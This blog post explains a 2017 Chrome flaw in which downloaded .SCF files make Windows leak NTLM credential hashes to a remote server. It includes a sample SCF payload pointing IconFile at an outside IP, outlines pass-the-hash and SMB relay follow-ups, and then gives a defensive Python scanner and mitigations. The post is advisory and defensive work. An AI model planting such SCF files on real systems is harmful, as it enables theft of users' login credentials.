There is a vulnerability in the current version of Google’s Chrome browser that can allow your Windows login, or network login, credentials to be pilfered by a remote hacker.
The problem occurs when Chrome downloads an apparently harmless .SCF file. These files are very much like the .LNK files of old. SCF stands for “Short-Cut File”. As researcher Bosko Stankovic points out in his original post here, an SCF file might look something like this:
[Shell]
IconFile=\\170.170.170.170\icon
After the Stuxnet exploit, Google changed Chrome so that downloaded .LNK files would have “.download” appended to their names, preventing the operating system from acting on them. However, no such corrective action was applied to .SCF files.
The SCF file is processed by Windows whenever the folder containing it (usually “Downloads”) is opened. In our example above, the local user’s PC will connect to IP address 170.170.170.170 and perform either NTLMv1 (NT LAN Manager, version 1) or NTLMv2 (version 2) authentication. What is sent is still a secure hash, however (version 2 is much more secure than version 1).
Still, with the secure hash captured, the attacker at 170.170.170.170 can do a few things:
- Brute-force the secure hash and recover the plaintext password using widely available NTLM tools.
- Feed the hash into another Windows system for authentication, say an Exchange Server (the plaintext password needn’t even be decrypted).
- Use SMB Relay tools to allow the hacker to access the various other accounts that might be associated with the user, such as OneDrive, Skype, Office 365, Xbox Live, etc.
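As an added defender-side check (not code from the original post or from the researcher’s write-up), the following Python script scans a folder such as “Downloads” for .SCF files, parses the `[Shell]` section the post shows, and classifies the `IconFile=` target: a UNC path pointing at a public IP or an unknown host is exactly the kind of entry that would make Explorer send an NTLM authentication off-site. The sample SCF bodies, the `trusted_hosts` allow-list and the `fileserver01` name are constructed for the demonstration.

```python
"""Scan a folder for .SCF files whose IconFile= points at a remote UNC share.

Added example, not code from the original post. It assumes the SCF layout the
post shows: a [Shell] section containing an IconFile= value.
"""
import ipaddress
import tempfile
import re
from pathlib import Path

# A UNC path looks like \\host\share\...; capture the host part.
# Assumption: plain UNC syntax only (no file:// or WebDAV variants).
_UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")

# Constructed sample SCF bodies (CRLF line endings, as Windows writes them).
SAMPLE_REMOTE = "[Shell]\r\nCommand=2\r\nIconFile=\\\\170.170.170.170\\icon\r\n"
SAMPLE_INTERNAL = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.5\\icons\\corp.ico\r\n"
SAMPLE_LOCAL = "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"


def parse_icon_file(text):
    """Return the IconFile value from the [Shell] section, or None if absent."""
    in_shell = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_shell = line.lower() == "[shell]"
            continue
        if in_shell:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "iconfile":
                return value.strip()
    return None


def classify_icon_file(icon, trusted_hosts=()):
    """Say where an IconFile value would make Explorer connect.

    Returns one of:
      "local"    - not a UNC path (local file, env-var path, icon resource index)
      "internal" - UNC host is a private/loopback/link-local IP or a trusted name
      "external" - UNC host is a public IP or a hostname not on the allow-list
    """
    if icon is None:
        return "local"
    m = _UNC_RE.match(icon)
    if not m:
        return "local"
    host = m.group(1)
    if host.lower() in {h.lower() for h in trusted_hosts}:
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # An unknown hostname still triggers an outbound SMB/NTLM attempt.
        return "external"
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "internal"
    return "external"


def scan_folder(folder, trusted_hosts=()):
    """Return [(file name, verdict, IconFile value)] for each .scf file in folder."""
    findings = []
    for path in sorted(Path(folder).iterdir()):
        # Compare the suffix case-insensitively: Windows treats .scf and .SCF alike.
        if path.is_file() and path.suffix.lower() == ".scf":
            text = path.read_text(encoding="utf-8", errors="replace")
            icon = parse_icon_file(text)
            findings.append((path.name, classify_icon_file(icon, trusted_hosts), icon))
    return findings


def demo():
    """Write the constructed samples to a temp dir (stand-in for Downloads) and scan it."""
    with tempfile.TemporaryDirectory() as d:
        samples = [("icon.scf", SAMPLE_REMOTE),
                   ("corp.SCF", SAMPLE_INTERNAL),
                   ("local.scf", SAMPLE_LOCAL)]
        for name, body in samples:
            (Path(d) / name).write_text(body, encoding="utf-8")
        return scan_folder(d, trusted_hosts=("fileserver01",))


if __name__ == "__main__":
    for name, verdict, icon in demo():
        print(f"{verdict:8s} {name}: IconFile={icon}")
```

Point the scanner at a real Downloads folder with `scan_folder(r"C:\Users\<user>\Downloads")`; reading the file with Python does not make Explorer resolve the icon, so the check itself does not trigger the outbound connection. Anything reported as “external” is worth deleting before the folder is opened in Explorer.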
Until Google fixes Chrome, there are a few things that can be done to mitigate the problem:
- Change Chrome settings to always ask where to save each file before downloading. The user can cancel the .SCF file download at that time.
- If you have a good firewall/UTM system, you can have it block the downloads of .SCF files.
- Perhaps the most reasonable solution would be to go into the network firewall/UTM and block incoming and outgoing TCP ports 139 and 445.
- Switch to another browser (Internet Explorer, Edge, Firefox, Opera, Safari, etc.).
Jared Hall
June 7, 2017 @ 9:01 pm
UPDATE: 6/4/2017: Google made a change in their File Type Policies, which is made available to all versions of Chrome. They now treat .SCF files as dangerous and pop up a warning message. See: https://bugs.chromium.org/p/chromium/issues/detail?id=722524